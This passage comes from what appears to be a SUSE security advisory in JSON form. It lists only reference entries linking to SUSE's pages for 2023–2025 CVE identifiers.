"url": "https://www.suse.com/security/cve/CVE-2023-54223/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54224 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54224/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54225 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54225/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54227 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54229 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54229/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54230 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54230/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54235 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54240 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54241 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54246 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54246/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54247 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54247/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54251 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54251/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54253 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54253/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54254 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54255 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54255/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54258 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54261 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54263 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54263/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54264 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54266 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54266/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54267 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54267/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54271 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54271/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54276 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54276/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54278 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54278/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54281 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54281/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54282 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54282/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54283 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54285 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54289 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54291 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54291/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54292 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54292/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54293 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54296 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54297 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54299 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54299/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54300 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54300/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54302 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54302/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54303 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54303/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54304 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54304/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54309 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54309/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54312 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54313 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54313/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54314 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54314/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54315 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54315/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54316 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54316/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54318 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54318/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54319 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54319/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54322 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54324 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54326 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54326/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26944 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26944/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-27005 page",
"url": "https://www.suse.com/security/cve/CVE-2024-27005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-42103 page",
"url": "https://www.suse.com/security/cve/CVE-2024-42103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53070 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53149 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22047 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22047/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38321 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38321/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39890 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39890/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39977 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40006 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40024 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40024/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40033 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40033/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40042 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40042/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40053 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40053/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40102 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40102/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40134 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40134/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40153 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40153/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40158 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40158/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40160 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40160/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40167 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40167/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40170 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40179 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40187 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40187/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40202 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40215 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40219 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40220 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40223 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40223/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40231 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40231/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40233 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40233/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40240 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40242 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40242/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40244 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40244/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40248 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40248/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40250 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40250/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40251 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40251/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40252 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40252/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40263 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40263/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40268 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40268/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40269 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40269/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40271 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40271/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40272 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40272/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40273 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40273/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40274 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40274/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40275 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40275/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40277 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40277/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40278 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40278/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40279 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40279/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40280 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40280/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40282 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40282/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40283 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40288 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40288/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40292 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40292/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40293 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40304 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40304/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40306 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40306/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40307 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40307/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40308 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40308/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40309 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40309/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40310 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40311 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40311/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40314 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40314/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40315 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40315/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40316 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40316/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40317 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40317/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40318 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40318/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40319 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40319/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40321 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40321/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40323 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40323/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40329 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40329/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40331 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40331/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40338 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40338/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40339 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40339/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40342 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40342/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40343 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40343/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40355 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68168 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68168/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68172 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68176 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68176/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68180 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68180/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68183 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68183/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68185 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68192 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68192/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68194 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68201 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68201/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68206 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68206/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68208 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68208/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68209 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68217 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68217/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68222 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68222/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68230 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68230/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68233 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68233/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68235 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68237 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68237/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68239 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68239/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68244 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68244/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68249 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68249/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68252 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68252/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68255 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68255/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68286 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68286/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68290 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68290/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68303 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68303/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68305 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68305/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68307 page",
